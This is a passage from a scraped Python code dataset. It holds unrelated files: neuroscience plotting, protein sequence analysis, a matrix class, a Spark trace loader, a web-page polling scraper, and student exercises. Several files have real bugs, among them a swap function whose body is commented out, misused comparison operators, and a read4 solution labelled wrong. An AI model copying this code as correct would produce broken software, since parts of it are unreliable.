as plt\n\nclass ByExp:\n def __init__(self, T=1000, dt=0.1):\n self.T = T\n self.dt = dt\n self.time_seq = np.arange(0, T, dt)\n self.allsteps = len(self.time_seq)\n\n def _biexp_func(self, t, Asyn, t_fall, t_rise):\n if t < 0:\n res = 0\n else:\n res = Asyn * (np.exp(-t / t_fall) - np.exp(-t / t_rise))\n return res\n\n\ndef main():\n c = ByExp()\n AMPA = np.zeros(c.allsteps)\n NMDA = np.zeros(c.allsteps)\n for i in range(0, c.allsteps):\n AMPA[i] = c._biexp_func(c.time_seq[i], 1.0, 5, 0.8)\n NMDA[i] = c._biexp_func(c.time_seq[i], 1.0, 125, 20)\n\n fig = plt.figure(figsize=(16, 12))\n ax = fig.add_subplot(111)\n ax.plot(c.time_seq, AMPA, label='AMPA', color='darkcyan')\n ax.plot(c.time_seq, NMDA, label='NMDA', color='darkmagenta')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"modular/bi_exp_test.py","file_name":"bi_exp_test.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"243954833","text":"import os, sys, re\nfrom math import *\nimport numpy\nfrom prody import *\nfrom General import *\nfrom PDB import *\nfrom Master import *\n\ndef simpleIdentity(seq1, seq2, unnat = False):\n '''seq1 and seq2 are three-letter sequences separated by space;\n if unnat is False, will not distinguish unnatural aa and its natural aa\n for example, MET and MSE will be considered to be same\n '''\n s1 = seq1.split()\n s2 = seq2.split()\n same = 0\n if len(s1) != len(s2):\n return -1 # -1 is sign of error\n for i in range(len(s1)):\n if unnat == False:\n r1 = t2s(s1[i])\n r2 = t2s(s2[i])\n if r1 == r2:\n same += 1\n else:\n if s1[i] == s2[i]:\n same += 1\n return float(same)/len(s1)\n\ndef trimByRMSD (input, coln, inhead, outhead, rcut, sorted = True, homo = None, homo_log = False):\n ''' the input file, can be either .match file or .seq file\n the column in the input file to look for rmsd values, from zero\n the header of the input file name, which is unique to procedure.\n for example, the header for 'uniq_bbrmsd1_rmsd0.8_1A2P_AA32_1.match' is 'uniq_bbrmsd1_rmsd0.8'\n the header of the output file to replace the input header\n the rmsd cutoff\n if true, assume the column is sorted, and exit the function for the first time when the cutoff is exceed. This saves some time\n if not None, it should be a list which contains the pdb-id to be excluded\n if True, write a file about the number of excluded hits\n '''\n ext = getExt(input)\n if ext != ('match' or 'seq'):\n raise myerror('Input not correctly provided...' + input)\n if ext == 'match':\n match = input\n seq = changeExt(input,'seq')\n else:\n seq = input\n match = changeExt(input, 'match')\n # need both .match and .seq files\n if (os.path.isfile(match) == False) or (os.path.isfile(seq) == False):\n raise myerror('Input file does not exist...' + input)\n \n fi_m = open(match)\n fi_s = open(seq)\n fo_m = open(match.replace(inhead, outhead), 'w') # output files\n fo_s = open(seq.replace(inhead, outhead), 'w')\n \n Ne = 0 # number of excluded lines by homo\n for line in fi_m:\n sline = fi_s.readline()\n rmsd = float(line.split()[coln])\n \n # parse the hit from match line\n if homo != None: # skip if pdb_id of a hit is in homolog list\n pid = getBase( removePath( line.split()[1] ) )\n if pid in homo:\n Ne += 1\n continue\n if rmsd <= rcut:\n fo_m.write(line)\n fo_s.write(sline)\n elif sorted == True:\n fo_m.close()\n fo_s.close()\n break\n \n if (homo != None) and (homo_log == True):\n logf = changeExt(match, 'log').replace(inhead, outhead)\n log = open(logf, 'w')\n log.write(str(Ne) + ' homologs excluded from ' + match +'\\n')\n log.close()\n \n return outhead # don't have to always use the return value\n\ndef underRMSD(col, cut, sorted = True):\n '''return the number of sequence under a certain rmsd in a .seq file\n '''\n i = -1\n if sorted == False:\n col.sort(key = float)\n for i in range(len(col)):\n if float(col[i]) > cut:\n return i\n return i+1 # if all sequence in the file are under the cutoff\n\ndef rmsdOfnseq(col, n, sorted = True):\n '''return the maximum rmsd in the top n sequences\n also returns n. if n is larger than the length of sequence file, modify the value of n\n '''\n if sorted == False:\n col.sort(key = float)\n n = min(n, len(col))\n return [col[n-1], n]\n\ndef trimByUniqSeq (seqf, inhead, outhead, nativeSeq = None, homo = None, unnat = False, homo_log = False):\n '''only keep unique sequences in .seq file, also trim corresponding .match file\n the .seq file\n the header of the input file name, which is unique to procedure.\n the header of output file name\n Native sequence is provided as a string of three letters. \n If provided, skip when the hit sequence is equal to native sequence.\n if not None, it should be a list which contains the pdb-id to be excluded\n if False, do not distinguish aa and its variant. \n For example, MET and MSE are not unique.\n if True, write a file about the number of excluded hits\n\n '''\n if getExt(seqf) != 'seq':\n raise myerror('Input not correctly provided...' + seqf)\n match = changeExt(seqf,'match')\n if (os.path.isfile(match) == False) or (os.path.isfile(seqf) == False):\n raise myerror('Input file does not exist...' + seqf)\n \n fi_m = open(match)\n fi_s = open(seqf)\n fo_m = open(match.replace(inhead, outhead), 'w') # output files\n fo_s = open(seqf.replace(inhead, outhead), 'w')\n \n seen = {}\n Ne = 0\n for line in fi_s:\n mline = fi_m.readline()\n t = line.split(None, firstNonumCol(line.split())) \n # note this number, so no-split will be made in sequence columns, t[-1] will be a string of three-letter sequence\n seq = t[-1].rstrip('\\n')\n \n if nativeSeq != None:\n if int( simpleIdentity(seq, nativeSeq) ) == 1:\n continue\n if int( simpleIdentity(seq, nativeSeq) ) == -1:\n return -1\n \n if homo != None:\n # parse the pdb id from match line\n pid = getBase( removePath( mline.split()[1] ) )\n if pid in homo:\n Ne += 1\n continue\n \n if unnat == False:\n seq = seq.split()\n skip = False\n for i in range(len(seq)):\n seq[i] = t2s(seq[i])\n if seq[i] == -1: # unrecognize unnatural aa, skip this sequence\n skip = True\n break\n if skip == True:\n continue\n seq = ' '.join(seq) \n # now seq is a single letter sequence string\n # so the difference will be removed\n \n if seq in seen:\n continue\n else:\n seen[seq] = 1\n fo_m.write(mline)\n fo_s.write(line)\n \n fo_m.close()\n fo_s.close()\n \n if (homo != None) and (homo_log == True):\n logf = changeExt(match, 'log').replace(inhead, outhead)\n log = open(logf, 'w')\n log.write(str(Ne) + ' homologs excluded from ' + match +'\\n')\n log.close()\n \n return outhead\n\ndef readColumn (file, coln, top = None):\n ''' a file to read\n a column number, start with 0\n top number of lines to read \n return: a list of column items\n '''\n assert os.path.isfile(file)\n lines = file2array(file)\n col = []\n count = 0\n for line in lines:\n col.append(line.split()[coln])\n count += 1\n if top != None:\n if count == top:\n break\n return col\n\ndef readMultiColumn (file, coln, top = None):\n ''' a file to read\n a list of column numbers to read, start with 0\n top number of lines to read\n return: a list of column items\n '''\n cols = []\n for n in coln:\n cols.append(readColumn(file, n, top))\n return cols\n\ndef readAACount (resnames, cols, colwts = None, unnat = False):\n ''' a list containing 3-letter residue names \n a list of columns, should have same number of elements to \n a column which contains the weights of sequences. should have the same length to each column\n when it is default (false), do not distinuish variants of AA\n for example, MET and MSE are considered to be the same, and count is just added to MET\n '''\n assert isinstance(resnames, list)\n assert isinstance(cols, list)\n assert len(resnames) == len(cols)\n if colwts == None:\n assert equalLists(cols) \n else:\n colsb = cols[:] # cannot use colsb = cols\n colsb.append(colwts)\n assert equalLists(colsb)\n count = 0\n if unnat == False:\n for r in range(len(resnames)):\n # each element of resnames can be list or string\n if isinstance(resnames[r], list):\n for rr in range( len(resnames[r]) ):\n resnames[r][rr] == t2s(resnames[r][rr])\n else:\n resnames[r] == t2s(resnames[r]) \n for i in range(len(cols[0])):\n ok = 1\n for j in range(len(cols)):\n if unnat == False:\n cols[j][i] == t2s(cols[j][i])\n if isinstance(resnames[j], list) and (cols[j][i] in resnames[j]):\n pass\n elif cols[j][i] == resnames[j]:\n pass\n else:\n ok = 0\n if ok == 1:\n if colwts != None:\n try:\n count += 1/float(colwts[i])\n except:\n pass\n else:\n count += 1\n return count\n\n\ndef informationContent(col, lowcount = True):\n lencol = len(col)\n H = {}\n for item in col:\n item = t2s(item)\n if not item in H:\n H[item] = 1\n else:\n H[item] += 1\n I = log(20)/log(2)\n for k in H.keys():\n p = float(H[k])/lencol\n I += p*log(p)/log(2)\n if lowcount:\n I -= 19.0/(2*lencol*log(2))\n if I < 0:\n I = 0\n return I\n\ndef informationContentQuick(col, norm = False):\n I = log(20)/log(2)\n col = map(float, col)\n for p in col:\n if not norm:\n p /= sum(col)\n I += p * log(p)/log(2)\n return I\n\ndef firstNonumCol(list):\n '''return the index of the first innumeric element. useful for .seq files'''\n for i in range(len(list)):\n try:\n float(list[i])\n except:\n return i\n\ndef index_from_match(line):\n '''return a list of residue indices of match regions in a given line from match files'''\n ilist = []\n idxrange = re.search('(\\[\\(.+\\)\\])', line).group(0)\n numbers = re.findall('\\d+', idxrange)\n for i in range(0, len(numbers), 2):\n start, end = int(numbers[i]), int(numbers[i+1])\n for x in range(start, end+1):\n ilist.append(x)\n return ilist","sub_path":"modules_py/Analyze.py","file_name":"Analyze.py","file_ext":"py","file_size_in_byte":10394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"154246136","text":"from vec import Vec\n\ndef getitem(M, k):\n \"Returns the value of entry k in M. The value of k should be a pair.\"\n assert k[0] in M.D[0] and k[1] in M.D[1]\n if k in M.f:\n return M.f[k]\n else:\n return 0\n\ndef setitem(M, k, val):\n \"Sets the element of v with label k to be val. The value of k should be a pair\"\n assert k[0] in M.D[0] and k[1] in M.D[1]\n M.f[tuple(k)] = val\n\n\ndef add(A, B):\n \"Returns the sum of A and B\"\n assert A.D == B.D\n mat = Mat(A.D, A.f.copy())\n for k in B.f.keys():\n mat[k] += B[k]\n return mat\n\ndef scalar_mul(M, alpha):\n \"Returns the product of scalar alpha with M\" \n A = M.copy()\n for k in A.f.keys():\n A[k] *= alpha\n return A\n\ndef equal(A, B):\n \"Returns true iff A is equal to B\"\n assert A.D == B.D\n for k in A.f.keys():\n if A[k] != B[k]:\n return False\n for k in B.f.keys():\n if A[k] != B[k]:\n return False\n return True \n\ndef transpose(M):\n \"Returns the transpose of M\"\n d = (M.D[1],M.D[0])\n f = dict()\n for k,v in M.f.items():\n f[(k[1],k[0])] = v\n return Mat(d,f)\n \n\ndef vector_matrix_mul(v, M):\n \"Returns the product of vector v and matrix M\"\n assert M.D[0] == v.D\n res = Vec(M.D[1], dict())\n for k in M.D[1]:\n res[k] = 0 \n for c in v.D:\n res[k] += v[c] * M[(c,k)]\n return res\n\n\ndef matrix_vector_mul(M, v):\n \"Returns the product of matrix M and vector v\"\n assert M.D[1] == v.D\n res = Vec(M.D[0], dict())\n for k in M.D[0]:\n res[k] = 0 \n for c in v.D:\n res[k] += v[c] * M[(k,c)]\n return res\n\ndef matrix_matrix_mul(A, B):\n \"Returns the product of A and B\"\n assert A.D[1] == B.D[0]\n res = Mat((A.D[0], B.D[1]), dict())\n for k1 in A.D[0]:\n for k2 in B.D[1]:\n res[(k1,k2)] = 0\n for k in A.D[1]:\n res[(k1,k2)] += A[(k1,k)] * B[(k,k2)]\n return res\n\n################################################################################\n\nclass Mat:\n def __init__(self, labels, function):\n self.D = labels\n self.f = function\n\n __getitem__ = getitem\n __setitem__ = setitem\n transpose = transpose\n\n def __neg__(self):\n return (-1)*self\n\n def __mul__(self,other):\n if Mat == type(other):\n return matrix_matrix_mul(self,other)\n elif Vec == type(other):\n return matrix_vector_mul(self,other)\n else:\n return scalar_mul(self,other)\n #this will only be used if other is scalar (or not-supported). mat and vec both have __mul__ implemented\n\n def __rmul__(self, other):\n if Vec == type(other):\n return vector_matrix_mul(other, self)\n else: # Assume scalar\n return scalar_mul(self, other)\n\n __add__ = add\n\n def __sub__(a,b):\n return a+(-b)\n\n __eq__ = equal\n\n def copy(self):\n return Mat(self.D, self.f.copy())\n\n def __str__(M, rows=None, cols=None):\n \"string representation for print()\"\n if rows == None:\n try:\n rows = sorted(M.D[0])\n except TypeError:\n rows = sorted(M.D[0], key=hash)\n if cols == None:\n try:\n cols = sorted(M.D[1])\n except TypeError:\n cols = sorted(M.D[1], key=hash)\n separator = ' | '\n numdec = 3\n pre = 1+max([len(str(r)) for r in rows])\n colw = {col:(1+max([len(str(col))] + [len('{0:.{1}G}'.format(M[row,col],numdec)) if isinstance(M[row,col], int) or isinstance(M[row,col], float) else len(str(M[row,col])) for row in rows])) for col in cols}\n s1 = ' '*(1+ pre + len(separator))\n s2 = ''.join(['{0:>{1}}'.format(c,colw[c]) for c in cols])\n s3 = ' '*(pre+len(separator)) + '-'*(sum(list(colw.values())) + 1)\n s4 = ''.join(['{0:>{1}} {2}'.format(r, pre,separator)+''.join(['{0:>{1}.{2}G}'.format(M[r,c],colw[c],numdec) if isinstance(M[r,c], int) or isinstance(M[r,c], float) else '{0:>{1}}'.format(M[r,c], colw[c]) for c in cols])+'\\n' for r in rows])\n return '\\n' + s1 + s2 + '\\n' + s3 + '\\n' + s4\n\n def pp(self, rows, cols):\n print(self.__str__(rows, cols))\n\n def __repr__(self):\n \"evaluatable representation\"\n return \"Mat(\" + str(self.D) +\", \" + str(self.f) + \")\"\n\n#v1 = Vec({1, 2, 3}, {1: 1, 2: 8})\n#M1 = Mat(({1, 2, 3}, {1, 2, 3}), {(1, 2): 2, (2, 1):-1, (3, 1): 1, (3, 3): 7})\n#print(v1 * M1)\n\n#from GF2 import one \n#M = Mat(({'a','b','c'}, {5}), {('a', 5):3, ('b', 5):7})\n#M['b', 5] = 9\n#M['c', 5] = 13\n#(M)\n#( Mat(({'a','b','c'}, {5}), {('a', 5):3, ('b', 5):9, ('c',5):13}))\n#(M == Mat(({'a','b','c'}, {5}), {('a', 5):3, ('b', 5):9, ('c',5):13}))\n","sub_path":"coding-matrix/week5/mat.py","file_name":"mat.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"464923601","text":"s1 = {3, 4, 5}\ns2 = {5, 6, 7}\ns3 = s1 & s2 #交集\ns4 = s1 | s2 #聯集\ns5 = s2 - s1 #指從s2中減去在S1重複的資料\ns6= s1 ^ s2 #反交集\nprint(s6)\n#set(字串)\ns7=set(\"hello\")\nprint(s7)\n#------------------------------------------\n#字典key:value\ndic = {\"apple\" : \"蘋果\", \"banana\" : \"香蕉\"}\ndic[\"apple\"] = \"新蘋果\"\nprint(\"apple\" in dic)\nprint(\"pine apple\" in dic)\ndel dic[\"apple\"]\nprint(dic)\nnumberdic = {x:x*2 for x in [3,4,5]}\nprint(numberdic)","sub_path":"basic/setAndDictionary.py","file_name":"setAndDictionary.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"228829386","text":"num_disks = int(input(\"How many disks? \").strip())\n\ndef load_source(num_disks):\n src = []\n while num_disks > 0:\n src.append(num_disks)\n num_disks -= 1\n return src\n\ndef hanoi(n, source, helper, target):\n if n > 0:\n # move tower of size n - 1 to helper:\n hanoi(n - 1, source, target, helper)\n # move disk from source peg to target peg\n if source:\n target.append(source.pop())\n # move tower of size n-1 from helper to target\n hanoi(n - 1, helper, source, target)\n print(source, helper, target)\n# print(\"Moves \", moves)\n\n\n\nsource = load_source(num_disks) \ntarget = []\nhelper = []\n\nprint(source, helper, target)\nhanoi(len(source),source,helper,target)\n\n\n","sub_path":"python_class/hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"423667510","text":"# + 添加过滤器\n\nfrom rest_framework.filters import coreapi,coreschema,BaseFilterBackend\n\nclass ProductFilter(BaseFilterBackend):\n def filter_queryset(self, request, queryset, view):\n query_keys = (\"type\")\n foreign_keys = (\"type\",)\n\n query = {key: request.GET.get(key) for key in query_keys if key in request.GET}\n # 此写法性能问题 查询的key 来自 request 如果 太多的话循环自然会很多\n # query = {key: request.GET.get(key) for key in request.GET if key in query_keys}\n\n # for foreign_key in foreign_keys:\n # if foreign_key in query:\n # query[foreign_key+\"id\"] = query.pop(foreign_key)\n\n return queryset.filter(**query)\n\n def get_schema_fields(self, views):\n res = super(ProductFilter,self).get_schema_fields(views)\n res.extend([\n coreapi.Field(\n name=\"type\",\n required=False,\n location=\"query\",\n schema=coreschema.Integer(\n title=\"类型id\",\n description=\"查询指定类型的商品\"\n )\n )\n ])\n","sub_path":"store/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"575667177","text":"class Solution(object):\n def __init__(self):\n self.buffer = [None for _ in range(4)]\n self.oneRead = 0\n\n def read(self, buf, n):\n lessthan4 = False\n haveRead = 0\n offset = 0\n while not lessthan4 and haveRead < n:\n if self.oneRead == 0:\n self.oneRead = read4(self.buffer)\n lessthan4 = self.oneRead < 4\n actRead = min(n - haveRead, self.oneRead)\n buf[haveRead:haveRead + actRead] = self.buffer[offset:offset + actRead]\n self.oneRead -= actRead\n offset = (offset + actRead) % 4\n haveRead += actRead\n return haveRead\n","sub_path":"158/158.read-n-characters-given-read4-ii-call-multiple-times.345246730.Wrong-Answer.leetcode.python3.py","file_name":"158.read-n-characters-given-read4-ii-call-multiple-times.345246730.Wrong-Answer.leetcode.python3.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40448536","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\nfrom pyspark.sql.functions import *\n\ndata_path = \"hdfs://10.1.4.11:9000/user/hduser/\"\n\nspark = SparkSession.builder\\\n .master(\"local[*]\")\\\n .appName(\"TraceAnalysis\")\\\n .getOrCreate()\n\nsc = spark.sparkContext\n#\nschema_machine_meta = StructType([\\\n StructField(\"machine_id\", StringType(), True),\\\n StructField(\"time_stamp\", LongType(), True),\\\n StructField(\"failure_domain_1\", LongType(), True),\\\n StructField(\"failure_domain_2\", StringType(), True),\\\n StructField(\"cpu_num\", LongType(), True),\\\n StructField(\"mem_size\", LongType(), True),\\\n StructField(\"status\", StringType(), True),])\n\ndf_machine_meta = spark.read.csv(data_path + \"machine_meta.csv\", header=False, schema=schema_machine_meta)\nprint(\"machine_meta:\")\ndf_machine_meta.show()\n\n\nschema_machine_usage = StructType([\\\n StructField(\"machine_id\", StringType(), True),\\\n StructField(\"time_stamp\", DoubleType(), True),\\\n StructField(\"cpu_util_percent\", IntegerType(), True),\\\n StructField(\"mem_util_percent\", IntegerType(), True),\\\n StructField(\"mem_gps\", DoubleType(), True),\\\n StructField(\"mkpi\", LongType(), True),\\\n StructField(\"net_in\", DoubleType(), True),\\\n StructField(\"net_out\", DoubleType(), True),\\\n StructField(\"disk_io_percent\", DoubleType(), True)])\nspark.read.format(\"csv\").option(\"header\", \"false\").schema(schema_machine_usage).load(data_path + \"machine_usage.csv\").createOrReplaceTempView(\"machine_usage\")\nprint(\"machine_usage:\")\nspark.sql(\"select * from machine_usage\").show()\ndf_machine_usage = spark.sql(\"SELECT CAST(SUBSTRING(machine_id, 3, 4) AS int) AS machine_id, time_stamp, cpu_util_percent, mem_util_percent, FLOOR(time_stamp / 900) AS minute FROM machine_usage\")\ndf_machine_usage.show()\n\n\"\"\"\ndf_machine_usage.write.partitionBy('day', 'minute').parquet(data_path + \"machine_usage.parquet\")\n\ndf_machine_usage.select(\"machine_id\", \"minute\", \"cpu_util_percent\", \"mem_util_percent\")\\\n .groupBy(\"machine_id\", \"minute\")\\\n .agg({\"cpu_util_percent\": \"avg\", \"mem_util_percent\": \"avg\"})\\\n .orderBy(\"machine_id\", \"minute\")\\\n .write.csv(data_path + \"machine_usage_output.csv\")\n \n\"\"\"\n\n#\nschema_container_meta = StructType([\\\n StructField(\"container_id\", StringType(), True),\\\n StructField(\"machine_id\", StringType(), True),\\\n StructField(\"time_stamp\", LongType(), True),\\\n StructField(\"app_du\", StringType(), True),\\\n StructField(\"status\", StringType(), True),\\\n StructField(\"cpu_request\", LongType(), True),\\\n StructField(\"cpu_limit\", LongType(), True),\\\n StructField(\"mem_size\", DoubleType(), True)])\ndf_container_meta = spark.read.csv(data_path + \"container_meta.csv\", header=False, schema=schema_container_meta)\nprint(\"container_mata:\")\ndf_container_meta.show()\n\n\n#\nschema_container_usage = StructType([\\\n StructField(\"container_id\", StringType(), True),\\\n StructField(\"machine_id\", StringType(), True),\\\n StructField(\"time_stamp\", DoubleType(), True), \\\n StructField(\"cpu_util_percent\", LongType(), True), \\\n StructField(\"mem_util_percent\", LongType(), True), \\\n StructField(\"cpi\", DoubleType(), True),\\\n StructField(\"mem_gps\", DoubleType(), True),\\\n StructField(\"mpki\", LongType(), True), \\\n StructField(\"net_in\", DoubleType(), True), \\\n StructField(\"net_out\", DoubleType(), True),\\\n StructField(\"disk_io_percent\", DoubleType(), True)])\ndf_container_usage = spark.read.csv(data_path + \"container_usage*.csv\", header=False, schema=schema_container_usage)\nprint(\"container_usage:\")\ndf_container_usage.show()\n\n#\nschema_batch_task = StructType([\\\n StructField(\"task_name\", StringType(), True),\\\n StructField(\"instance_num\", LongType(), True),\\\n StructField(\"job_name\", StringType(), True), \\\n StructField(\"task_type\", StringType(), True), \\\n StructField(\"status\", StringType(), True), \\\n StructField(\"start_time\", LongType(), True),\\\n StructField(\"end_time\", LongType(), True),\\\n StructField(\"plan_cpu\", DoubleType(), True), \\\n StructField(\"plan_mem\", DoubleType(), True)])\n\ndf_batch_task = spark.read.format(\"csv\").option(\"header\", \"false\").schema(schema_batch_task).load(data_path + \"batch_task.csv\")\nprint(\"batch_task:\")\ndf_batch_task.show()\n\n#\nschema_batch_instance = StructType([ \\\n StructField(\"instance_name\", StringType(), True), \\\n StructField(\"task_name\", StringType(), True), \\\n StructField(\"job_name\", StringType(), True), \\\n StructField(\"task_type\", StringType(), True), \\\n StructField(\"status\", StringType(), True), \\\n StructField(\"start_time\", LongType(), True),\\\n StructField(\"end_time\", LongType(), True),\\\n StructField(\"machine_id\", StringType(), True), \\\n StructField(\"seq_no\", LongType(), True), \\\n StructField(\"total_seq_no\", LongType(), True), \\\n StructField(\"cpu_avg\", DoubleType(), True),\\\n StructField(\"cpu_max\", DoubleType(), True), \\\n StructField(\"mem_avg\", DoubleType(), True), \\\n StructField(\"mem_max\", DoubleType(), True)])\n\ndf_batch_instance = spark.read.format(\"csv\").option(\"header\", \"false\").schema(schema_batch_instance).load(data_path + \"batch_instance*.csv\")\nprint(\"batch_instance:\")\ndf_batch_instance.show()\n\n\n# for i in machine_ids.collect():\n# df_machine_usage.orderBy(\"machine_id\").filter(df_machine_usage[\"machine_id\"] == i.machine_id).show()\n#\n\n\n# df_machine_usage.filter((df_machine_usage['machine_id'] == \"m_1\") & (df_machine_usage['time_stamp'] == '683653')).show()\n\n# machine_ids.select(\"machine_id\").foreach(lambda row: print(row))\n\n# df_machine_usage.createOrReplaceTempView(\"machine_usage\")\n# sqlDF_machine_usage = spark.sql(\"SELECT * FROM machine_usage group by machine_id\")\n\n# df_machine_usage.filter(df_machine_usage['machine_id'] == 'm_967').show()\n\n\n\n#\n# machine_list = sqlDF_machine_meta.collect()\n# print(machine_list)\n\n# sqlDF_machine_meta.foreach(lambda row: sqlDF_machine_usage.filter(\"machine_id=\" + row.machine_id).write.csv(\"/mnt/1AF492ABF49288A1/MScProject/split/machine_usage_\" + row.machine_id, mode=\"overwrite\", header=\"true\"))\n# machine_ids.foreach(lambda row: print(row.machine_id))\n\n\nspark.stop()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"458635251","text":"\"\"\"\r\nfile: multiSort.py\r\nlanguage: python3\r\nauthor: mal3941@g.rit.edu Moisés Lora Pérez\r\nclass: CSCI 141-03\r\n\"\"\"\r\ndef swap(lst,i,j):\r\n \"\"\"\r\n This swap function swaps the index of i to the one in j.\r\n :param lst: Inputed list\r\n :param i: index\r\n :param j: other index\r\n :return: swapped list\r\n \"\"\"\r\n \"\"\"\r\n temp = lst[i]\r\n lst[i] = lst[j]\r\n lst[j] = temp\r\n \"\"\"\r\n #lst[i], lst[j] = lst[j], lst[i]\r\n\r\ndef insert(lst,mark):\r\n \"\"\"\r\n This function decreases the value of the index\r\n\r\n :param lst: Inputed list\r\n :param mark: index\r\n\r\n \"\"\"\r\n index = mark\r\n while index > -1 and lst[index] > lst[index+1]:\r\n swap(lst, index, index +1)\r\n index -= 1\r\n\r\ndef insertionSort(lst):\r\n \"\"\"\r\n This function sorts the list in a descending matter\r\n :param lst: inputed list\r\n :return: list sorted in descending order\r\n \"\"\"\r\n for mark in range(len(lst)-1):\r\n insert(lst, mark)\r\n return lst\r\n\r\ndef minFrom(lst, mark):\r\n \"\"\"\r\n This function returns the minimum current index of the list\r\n :param lst: inputed list\r\n :param mark: current index\r\n :return: the minimum current index of the list\r\n \"\"\"\r\n currIndex = mark\r\n for i in range(mark, len(lst)):\r\n if lst[currIndex] > lst[i]:\r\n currIndex = i\r\n return currIndex\r\n\r\ndef perkSort(lst):\r\n \"\"\"\r\n This function swaps the elements whenever the left element is larger.\r\n :param lst: inputed list\r\n :return: the list sorted\r\n \"\"\"\r\n swapMade = True\r\n while swapMade:\r\n swapMade=False\r\n for i in range(0, len(lst)-1):\r\n if lst[i] > lst[i+1]:\r\n swap(lst, i, i+1)\r\n swapMade = True\r\n return lst\r\n\r\ndef selectionSort(lst):\r\n \"\"\"\r\n This function returns the sequence of values that can be cut into two sub-sequences such that the first\r\n sub-sequence is in order and all the elements are less than or equal to the elements of the second sub-sequence.\r\n :param lst: inputed list\r\n :return: the sorted list\r\n \"\"\"\r\n for i in range(0, len(lst)-1):\r\n swap(lst, i, minFrom(lst,i))\r\n return lst\r\n\r\ndef professorFurySorted(lst):\r\n \"\"\"\r\n Returns the sorting.\r\n :param lst: inputed list\r\n :return: sorted list\r\n \"\"\"\r\n\r\n return professorFurySort(lst, 0, len(lst)-1)\r\n\r\ndef professorFurySort(lst, start, end):\r\n \"\"\"\r\n This function sorts recursively if the first item is larger than the last one then swaps them if its greater\r\n than two, it'll sort the first 2/3 of the list , then last and again the first and then return the list.\r\n :param lst:\r\n :param start:\r\n :param end:\r\n :return:\r\n \"\"\"\r\n if end is None:\r\n end = len(lst)-1\r\n if lst[start] > lst[end]:\r\n swap(lst,start,end)\r\n\r\n if end-start > 1:\r\n lst = professorFurySort(lst, start, (2*end//3))\r\n lst = professorFurySort(lst, start + (end//3)+1, end)\r\n lst = professorFurySort(lst, start, (2*end//3))\r\n\r\n return lst\r\n\r\ndef convertFile(filename):\r\n \"\"\"\r\n This converst the textfile to a list\r\n :param filename: textfile used\r\n :return: a list is returned\r\n \"\"\"\r\n file = open(filename)\r\n wordList = []\r\n for currentLine in file:\r\n wordList.append((currentLine.strip()))\r\n return wordList\r\n\r\ndef testing(lst,expected):\r\n \"\"\"\r\n This tests the list with the expected one.\r\n :param lst: inputed list\r\n \"\"\"\r\n emptylist = []\r\n expected = []\r\n testSort(lst,expected)\r\n singleElementlist = [1]\r\n expected = [1]\r\n testSort(lst,expected)\r\n reverseSorteda = [5,4,3,2,1]\r\n expected = [1,2,3,4,5]\r\n testSort(lst,expected)\r\n reverseSortedb = [10,9,8,7,6]\r\n expected = [6.7,8,9,10]\r\n testSort(lst,expected)\r\n sorteda = [1,2,3,4,5]\r\n expected = [1,2,3,4,5]\r\n testSort(lst,expected)\r\n sortedb = [6,7,8,9,10]\r\n expected = [6,7,8,9,10]\r\n testSort(lst,expected)\r\n randoma = [45,60,79,92]\r\n expected = [45,60,79,92]\r\n testSort(lst,expected)\r\n\r\ndef testSort(lst, expected):\r\n \"\"\"\r\n This functions tests the sorting algorithms with the expected lists.\r\n :param lst: test list\r\n :param expected: expected list\r\n :return: boolean value\r\n \"\"\"\r\n if insertionSort(lst) == expected:\r\n return True\r\n else:\r\n return False\r\n\r\n if perkSort(lst) == expected:\r\n return True\r\n else:\r\n return False\r\n if selectionSort(lst) == expected:\r\n return True\r\n else:\r\n return False\r\n if professorFuryHelp(lst) == expected:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef main():\r\n\r\n #this executes the function\r\n\r\n textFile = str(input(\"Enter the filename:\"))\r\n lst = [55, 100, 92, 66, 35, 54, 26, 7, 70]\r\n print(selectionSort(lst))\r\n\r\nmain()\r\n\r\n","sub_path":"Computer Science 1/Labs/lab5/multiSort.py","file_name":"multiSort.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"462580910","text":"import shutil \nimport os \nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\nimport difflib\n#import emailScript\n\nurl = \"https://www.adidas.com.au/yeezy\"\n\n#web_r = requests.get(url)\n#web_soup = BeautifulSoup(web_r.text, 'html.parser')\n\n#print(len(web_soup.findAll(\"img\")))\nlistVersion = []\n\ndriver = webdriver.Firefox()\ninter = 0\n\ndriver.get(url)\n\nhtml = driver.execute_script(\"return document.documentElement.outerHTML\")\nsel_soup = BeautifulSoup(html, 'html.parser')\nlistVersion.append(sel_soup.prettify())\n\nwhile(inter < 10):\n\tdriver.get(url)\n\n\thtml = driver.execute_script(\"return document.documentElement.outerHTML\")\n\tsel_soup = BeautifulSoup(html, 'html.parser')\n\n\t#listVersion.append(sel_soup.prettify())\n\t#print(sel_soup.prettify())\n\tlistVersion.append(sel_soup.prettify())\n\tif len(listVersion)> 2:\n\t\tlistVersion.remove()\n\tdiff = difflib.ndiff(listVersion[1],listVersion[0])\n\n\tprint(''.join(diff))\n\tinter +=1 \n\tprint(inter)\n\ttime.sleep(10)\n\n\n\n\n\n\n# images = []\n# for i in 